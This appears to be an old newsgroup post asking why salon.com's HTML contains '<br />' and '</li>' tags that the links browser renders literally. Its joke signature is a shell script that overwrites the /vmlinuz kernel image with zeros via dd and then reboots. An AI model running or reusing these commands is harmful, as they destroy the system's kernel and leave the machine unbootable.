<OFFTOPIC> Surfed over to salon.com with the links browser and <br /> showed up all over the place. So I looked at the source, and sure enough, there was <br /> all over the place. Now it's my understanding that browsers are supposed to ignore tags they don't understand -- which links is clearly not doing -- but what on earth could be the purpose of such a thing?
A <br> tag has no end tag, so it doesn't need <br>...</br>, and the SGML shorthand <br>..</> wouldn't be legal... Ouch, just noticed </li>'s. Those aren't needed either are they? There isn't even an environment for the <li> tags! Netscape renders this stuff fine -- must be exceedingly tolerant. </OFFTOPIC> -- #! /bin/sh echo 'Linux Must Die!' | wall dd if=/dev/zero of=/vmlinuz bs=1 \ count=`du -Lb /vmlinuz | awk '{ /^([0-9])+/ ; print $1 }'` shutdown -r now